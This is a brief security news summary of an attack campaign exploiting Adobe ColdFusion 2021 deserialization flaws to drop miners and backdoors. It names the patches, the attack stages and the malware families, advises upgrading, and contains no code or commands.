Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware

/in


  • Remote attackers can exploit pre-authentication RCE vulnerabilities in Adobe ColdFusion 2021 to seize control of affected systems.
  • Adobe has released security patches to address these vulnerabilities, but attackers are still exploiting them.
  • The attack campaign involves multiple stages, including probing, reverse shells, and the deployment of malware.
  • Four distinct malware strains have been identified: XMRig Miner, Satan DDoS/Lucifer, RudeMiner, and BillGates/Setag backdoor.
  • Users are advised to upgrade their systems promptly and deploy protection mechanisms to thwart ongoing attacks.

Numerous users of both Windows and macOS platforms are currently at risk due to vulnerabilities present in Adobe ColdFusion. This software suite, a popular choice for web application development, recently came under attack as remote attackers discovered and exploited pre-authentication remote code execution (RCE) vulnerabilities. Such vulnerabilities granted attackers the ability to seize control of affected systems, raising the alarm to a critical severity level.

The crux of these attacks targets the WDDX deserialization process within Adobe ColdFusion 2021. While Adobe responded swiftly with security updates (APSB23-40, APSB23-41, and APSB23-47), FortiGuard Labs observed continued exploitation attempts. 

An analysis of the attack patterns uncovered a process executed by the threat actors. They initiated probing activities using tools like “interactsh” to test the exploit’s effectiveness. These activities were observed involving multiple domains including mooo-ngcom, redteamtf, and h4ck4funxyz. The probing phase provided attackers insights into potential vulnerabilities and served as a precursor to more malicious actions.

The attack campaign’s sophistication extended to the utilization of reverse shells. By encoding payloads in Base64, attackers sought to gain unauthorized access to victim systems, enabling remote control. 

Notably, the analysis disclosed a multi-pronged approach, including the deployment of various malware variants. Attacks were launched from distinct IP addresses, raising concerns about the campaign’s widespread reach. Malware payloads were encoded…

Source…